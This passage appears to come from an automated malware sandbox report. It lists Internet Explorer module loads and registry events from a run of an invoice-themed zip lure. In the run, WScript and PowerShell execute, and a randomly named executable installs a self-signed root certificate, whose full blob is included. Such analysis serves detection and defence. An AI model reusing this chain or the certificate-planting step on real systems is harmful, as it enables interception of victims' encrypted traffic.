c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
652
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
1904
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

Registry activity

Total events
2933
Read events
2617
Write events
315
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2856
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2856
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@C:\Windows\System32\wshext.dll,-4802
VBScript Script File
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\Desktop
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_0
4C000000730100000402000000000000D4D0C80000000000000000000000000000000000000000006E010600000000000000000039000000B402000000000000000000000000000001000000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_1
4C000000730100000500000000000000D4D0C8000000000000000000000000000000000000000000B00105000000000000000000160000002A00000000000000000000000000000002000000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_2
4C000000730100000400000000000000D4D0C8000000000000000000000000000000000000000000B20107000000000000000000160000006400000000000000000000000000000003000000
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2592
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1628
dVjiJafHlc.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
1628
dVjiJafHlc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
1628
dVjiJafHlc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
Blob
0400000001000000100000001BAA5A0ECD1ED4B64DFBF621DC9044BF0F000000010000002000000061905BC048345D3815587E318FEAAE705D07527F3B5BD1B2A6AF514E29BA46525C000000010000000400000000080000030000000100000014000000E02357FC7708441D4B0BE5F371F4B28961870F70140000000100000014000000ECCD4BA46722CB4F92060701865DDF09D8AF68B41900000001000000100000000FB5FACA274B0EA933E42C34A45C2D5620000000010000006A030000308203663082024EA003020102020900EE1E7E5DC92BCE32300D06092A864886F70D01010B05003048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E79301E170D3137303932393132323035305A170D3230303932383132323035305A3048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100C213E403EA7099364CC3D32AE10D85F8364F3874F86A14DAD9972751C9F548F6025F083F3F8BE947523744A631B6E409CF2CEFBC28F5C9F16ACD3C88ABE7BA7A5871A1CBF3562F7A576C3E9FAED296B5B9867651DB238499683B4E9D768FDA49C5BCA2A9928AFAF2EAD01F1FBE679E6D8ECC7BA57BB55DFA44C03A14BF11D36C7F9D654AC6B76DF9E8D83E1D238A1BCFAA22BADF071A9300CBDCC71C58846BD4ECB7F2BA7BBEF630C61B4FB01BC67E022BE89E243B0EF7F6ABBAC502A48E1DE65787B538F842E83652C365E26F2D47BFA5132215B96E2725AC3FD496BAE376D778A2C3C35D0382B89F61961BF6BA08DB4A892B4BCE3FA96FF3990C6066F1E1FF0203010001A3533051301D0603551D0E04160414ECCD4BA46722CB4F92060701865DDF09D8AF68B4301F0603551D23041830168014ECCD4BA46722CB4F92060701865DDF09D8AF68B4300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010095A081FEE7794AAE6A222E01AD459EB4288CA6DCD8E1A4F5EDF609C4ACB16E19F51B543E8C75E6B833556E22641E3619EE31F26A7F5477CA8AB8F7417BFDAE076DD329D01C490D1551313F6BA132F46CAFB608C0378CBB1F1C019C573824F7758EAB50AACBE52E4D7B2EC5BD50B555CF4EC9A29892E262ED148EEC6C07F8BDD9D3BECE8402498A490A20A7F518A918065213AE11EBAC77BD1504B4E60EB2C928DA2ACE10A2B7BB7398D229D3EC6A1C2C2BE2E9C5B10C62E4012057E62598096315D01E46D8BC72E239374AB31A79CA0FE4BA94A64B3934E5C618DDB3B56089FEA4D8BAF00EC868FEE19ECCD0EA27360E690B838D3AD4DBF5BF6448F4894867E3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
2
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
2055191936
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
2355349436
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000077000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{B81E0021-5F5A-11E9-8447-5254004AAD21}
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002C002F001E00
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2136
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
2372224436
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
3614640886
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30733209
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188356
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3666608
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB010000002A83B6021EF2C7499630A24288AB378900000000020000000000106600000001000020000000ED025C45DEA2C4B2982738674D80125E349F3D31F0B6F477B717B6B58EA54ED0000000000E8000000002000020000000F6B5CCD65762AF260FBCB126F974C87B0426DE54EA19F4F596E8D4FAE1AB9C0B3000000022FE135F1ED16C39C928FB9606DAE84A58744E7C0A1F4ECD968BD3AAE7202C1F2E75705CFC5A8AA1D0F83C19ECF09D80400000002B621CC61345F5D8FDE2F0DDC61F95ABC1BA87C452A3C8BF6901E0FFDE7AD04377E1E432EF46AC4F114A0DF9883A27138D5C6E531847A086CAC4616C6478A560
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
C067DC8D67F3D401
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188356
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
0
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000078000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{CD2CA503-5F5A-11E9-8447-5254004AAD21}
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002D0016002E00
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB010000002A83B6021EF2C7499630A24288AB378900000000020000000000106600000001000020000000EDD92B0797820EF92A690010325797874B1D9185765E6BF6A1D0F34F0F2D7158000000000E80000000020000200000000CF82A9BA56D469995285EDD8D7E65832B752E119D65F2F1E7D38A86A21E7BA830000000E14C206076BC9EFC2818984503CF51FB47DD4E8DFC877286EE42DB9622C4F571E483C3BE2F79586CD779281D49D9C09D400000007427D2EE460080D3ADAE30912E3FB38C2960FEF4B122CEC8F1538FC6128951D6A61657747F6813136B777E69104583AADE0FF0D9295AF75928008266FD846C1C
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
007E8D9067F3D401
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000079000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
908
iexplore.exe
write
